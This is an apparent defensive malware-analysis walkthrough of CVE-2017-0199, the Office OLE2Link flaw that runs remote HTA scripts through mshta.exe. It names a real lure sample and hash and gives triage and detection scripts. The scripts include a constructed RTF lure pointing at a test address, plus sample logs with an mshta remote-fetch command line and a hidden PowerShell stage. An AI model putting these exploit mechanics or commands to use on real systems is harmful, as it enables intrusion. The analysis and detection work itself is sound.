CVE-2017-0199 is a logic flaw in the way Microsoft Office handles OLE2 linked objects, often described as a "link type" confusion. The attacker embeds a linked object whose target is a remote URL in an RTF or DOCX document. When the document is opened, Office fetches the target, and because the server returns it with the Content-Type application/hta, Office hands the response to the HTA (HTML Application) handler, mshta.exe, which runs the embedded script. No memory corruption is involved and no macro warning is shown. In the wild the lure was typically an RTF file carrying a .doc extension, as with the sample below.
Filename: Unpaid_Invoice_829182.doc
MD5: 1cfd12688b1f93545a3dc91366c86825
Sample: Download via Reverse.it
Technical Walkthrough
Background
CVE-2017-0199 is a critical remote code execution (RCE) vulnerability in the way Microsoft Office and Windows WordPad parse specially crafted files; Microsoft fixed it in the April 2017 security updates after it had already been exploited in the wild. It abuses the OLE (Object Linking and Embedding) interface: a linked object in the document points at an attacker-controlled URL, and the \objupdate control word makes Office refresh the link as soon as the file is opened. The fetched resource, an HTA file served with the Content-Type application/hta, is executed by mshta.exe in the user's security context. Opening the document outside Protected View is the only user interaction required; inside Protected View the remote fetch does not take place.
General Analysis Procedure
Follow these standard forensic steps to identify and analyze CVE-2017-0199 samples:

- Static File Assessment: Inspect metadata (author, timestamps) and any digital signature. Use the file command on Linux to confirm what the document really is: an OLE2 compound binary, an OOXML zip, or, as with most in-the-wild lures, an RTF file carrying a .doc extension. Never trust the extension.
- Hex Analysis: Open the file in a hex editor (HxD, Hexinator). An OLE2 container begins with the signature D0 CF 11 E0 A1 B1 1A E1; an RTF file begins with {\rtf. In an RTF, locate the \object group and check for the \objupdate control word, which forces the linked object to refresh on open, and the \objdata group, which holds the object as hex text. Decoding that hex reveals the class name OLE2Link (4F 4C 45 32 4C 69 6E 6B) and the moniker target. The URL is normally stored as UTF-16LE, so a plain ASCII search for http:// can miss it; search for the wide form as well.
- Sandbox Dynamic Analysis: Execute the file in an isolated virtual machine (VirtualBox, Sandboxie) with Protected View disabled, otherwise the fetch never happens. Monitor WINWORD.EXE or EXCEL.EXE for outbound HTTP requests to unusual hosts and watch for mshta.exe being spawned with the remote URL on its command line.
- Automated Tools: Submit the hash to VirusTotal, run the sample through Cuckoo or Hybrid-Analysis, and use oletools (rtfobj for RTF, oleobj for OLE2) to extract the embedded object and its target URL. Collect Indicators of Compromise (IOCs) such as registry changes, dropped files, and child process creation (e.g., mshta.exe).
- Log Review: In the packet capture (Wireshark), look for the HTTP response carrying Content-Type: application/hta to a request for what looked like a document, then use Process Monitor (ProcMon) to follow the transition from the document application to mshta.exe and whatever it launches next.
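The static steps above (container identification by magic, \objupdate and \objdata inspection, OLE2Link and URL extraction) as one runnable triage script. This is an added example, not code from the original post: the RTF it analyses is constructed in memory, its \objdata blob is a hand-built stand-in that carries only the indicators the script looks for rather than a real OLE object stream, and the URL uses an RFC 5737 test address.

```python
"""Static triage of a suspected CVE-2017-0199 lure (RTF or OLE2 container).

Added example for this walkthrough, not code from the original post. The RTF
sample below is constructed: its \\objdata blob is a stand-in that only carries
the indicators the triage looks for, not a real OLE object stream.
"""
import re

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # compound file header
RTF_MAGIC = b"{\\rtf"
OLE2LINK = b"OLE2Link"                            # class name of the linked object

# Hex payload of every \objdata group (RTF stores embedded objects as hex text).
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
# URLs as ASCII and as UTF-16LE (the form a URL moniker stores its target in).
URL_CHARS = rb"A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-"
URL_ASCII_RE = re.compile(rb"https?://[" + URL_CHARS + rb"]+")
URL_WIDE_RE = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[" + URL_CHARS + rb"]\x00)+")


def build_sample() -> bytes:
    """Constructed RTF lure: \\objupdate plus an OLE2Link object pointing at a
    remote .doc (the server would answer with application/hta)."""
    url = "http://203.0.113.10/template.doc"          # RFC 5737 test address
    stream = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + OLE2LINK + b"\x00"
              + url.encode("utf-16-le") + b"\x00\x00")
    return (b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}\n"
            b"{\\object\\objautlink\\objupdate\\rsltpict{\\*\\objclass Word.Document.8}\n"
            b"{\\*\\objdata " + stream.hex().encode("ascii") + b"}}\n"
            b"\\par Unpaid invoice attached.\\par}")


def file_type(data: bytes) -> str:
    """Identify the container by magic bytes rather than trusting the extension."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.lstrip().startswith(RTF_MAGIC):
        return "rtf"
    return "unknown"


def extract_objdata(data: bytes) -> list[bytes]:
    """Decode every \\objdata hex blob in an RTF file to raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(data):
        hextext = re.sub(rb"\s+", b"", m.group(1))
        if len(hextext) % 2:            # tolerate a truncated trailing nibble
            hextext = hextext[:-1]
        blobs.append(bytes.fromhex(hextext.decode("ascii")))
    return blobs


def extract_urls(blob: bytes) -> set[str]:
    """Pull both narrow and wide (UTF-16LE) http(s) URLs out of a byte stream."""
    urls = {m.group(0).decode("ascii") for m in URL_ASCII_RE.finditer(blob)}
    urls |= {m.group(0).decode("utf-16-le") for m in URL_WIDE_RE.finditer(blob)}
    return urls


def triage(data: bytes) -> dict:
    """Return the CVE-2017-0199 indicators found in a document."""
    report = {"type": file_type(data),
              "objupdate": b"\\objupdate" in data,    # link refreshes on open
              "ole2link": False,
              "urls": set()}
    if report["type"] == "rtf":
        for blob in extract_objdata(data):
            if OLE2LINK in blob:
                report["ole2link"] = True
            report["urls"] |= extract_urls(blob)
    elif report["type"] == "ole2":
        # A native .doc keeps the link in its ObjectPool storage; a raw scan
        # still surfaces moniker URLs, but confirm the object with oleobj.
        report["urls"] |= extract_urls(data)
    report["suspicious"] = report["ole2link"] and bool(report["urls"])
    return report


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(f"{key:>10}: {value}")
```

Real lures often obfuscate the \objdata hex (line breaks, stray control words, padding before the object header), so treat this as the shape of the check rather than a complete parser; rtfobj from oletools handles those variants and flags OLE2Link objects directly.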
Mitigation & Conclusion
Effective defense against CVE-2017-0199 starts with applying the April 2017 Office updates and keeping Protected View enabled for files from the internet and from Outlook attachments, since the remote fetch does not happen inside Protected View. On the endpoint, restrict or block mshta.exe with application control (AppLocker or Windows Defender Application Control) where HTA files have no business use, and alert on Office processes spawning mshta.exe or other script hosts. On the network, alert on HTTP responses carrying Content-Type: application/hta, especially when the requested path looks like a document, and monitor Office processes for outbound connections to unfamiliar hosts; together these catch the remote OLE object fetch the exploit depends on.
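The detection side of these mitigations, as an added example that is not from the original post: process-chain rules (an Office process spawning a script host, mshta.exe fetching a remote HTA, mshta.exe spawning an interpreter) run over constructed Sysmon-style process-creation events, plus a proxy-log rule for HTA content served under a document extension. Hostnames, addresses and paths are invented, and the JSON field names and Office15 install path are assumptions about the telemetry layout.

```python
"""Behavioural detection for CVE-2017-0199 activity over endpoint and proxy logs.

Added example for this walkthrough, not code from the original post. Both log
samples are constructed to resemble Sysmon process-creation events and a web
proxy access log; hosts, addresses and paths are invented.
"""
import json

OFFICE_PROCS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation events, one JSON object per line (Sysmon EID 1 style).
PROCESS_EVENTS = r"""
{"ts":"2017-04-12T09:14:02Z","host":"WS-042","parent":"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE","image":"C:\\Windows\\System32\\mshta.exe","cmdline":"mshta.exe http://203.0.113.10/template.doc"}
{"ts":"2017-04-12T09:14:03Z","host":"WS-042","parent":"C:\\Windows\\System32\\mshta.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -f C:\\Users\\Public\\stage.ps1"}
{"ts":"2017-04-12T09:20:09Z","host":"WS-017","parent":"C:\\Windows\\explorer.exe","image":"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE","cmdline":"WINWORD.EXE /n q1.docx"}
{"ts":"2017-04-12T09:20:40Z","host":"WS-017","parent":"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE","image":"C:\\Windows\\splwow64.exe","cmdline":"splwow64.exe 12288"}
"""

# Constructed proxy log: timestamp client method url status content-type.
PROXY_LOG = """
2017-04-12T09:13:58Z 10.0.5.42 GET http://203.0.113.10/template.doc 200 application/hta
2017-04-12T09:13:59Z 10.0.5.42 GET http://203.0.113.10/favicon.ico 404 text/html
2017-04-12T09:20:11Z 10.0.5.17 GET http://intranet.example/finance/q1.docx 200 application/vnd.openxmlformats-officedocument.wordprocessingml.document
2017-04-12T09:21:00Z 10.0.5.17 GET http://intranet.example/tools/helper.hta 200 application/hta
"""


def image_name(path: str) -> str:
    """Last path component, lower-cased, so rules compare executables only."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_process_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.strip().splitlines()]


def detect_process_chain(events: list[dict]) -> list[tuple[str, str, str]]:
    """Flag the chain the exploit produces: Office -> mshta.exe -> next stage."""
    alerts = []
    for e in events:
        parent, child = image_name(e["parent"]), image_name(e["image"])
        if parent in OFFICE_PROCS and child in SCRIPT_HOSTS:
            alerts.append((e["host"], "office_spawns_script_host", f"{parent} -> {child}"))
        if child == "mshta.exe" and "http" in e["cmdline"].lower():
            alerts.append((e["host"], "mshta_remote_hta", e["cmdline"]))
        if parent == "mshta.exe" and child in SCRIPT_HOSTS:
            alerts.append((e["host"], "mshta_spawns_interpreter", f"{parent} -> {child}"))
    return alerts


def detect_hta_downloads(log: str) -> list[tuple[str, str, str]]:
    """Flag successful HTA downloads. An HTA served under a document-looking
    path is the CVE-2017-0199 pattern and gets the higher severity."""
    alerts = []
    for line in log.strip().splitlines():
        _ts, client, _method, url, status, ctype = line.split()
        if not status.startswith("2") or ctype.lower() != "application/hta":
            continue
        path = url.split("?", 1)[0].lower()
        severity = "medium" if path.endswith(".hta") else "high"
        alerts.append((client, severity, url))
    return alerts


if __name__ == "__main__":
    for alert in detect_process_chain(parse_process_events(PROCESS_EVENTS)):
        print("PROCESS", *alert)
    for alert in detect_hta_downloads(PROXY_LOG):
        print("PROXY  ", *alert)
```

The benign WINWORD.EXE events (launched by explorer.exe, and spawning the print helper splwow64.exe) produce no alerts, which is the point of matching on specific child images rather than on any Office child process. Correlating the 10.0.5.42 proxy hit with the WS-042 process chain a few seconds later is what turns two medium-confidence signals into an incident.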
Happy hunting.
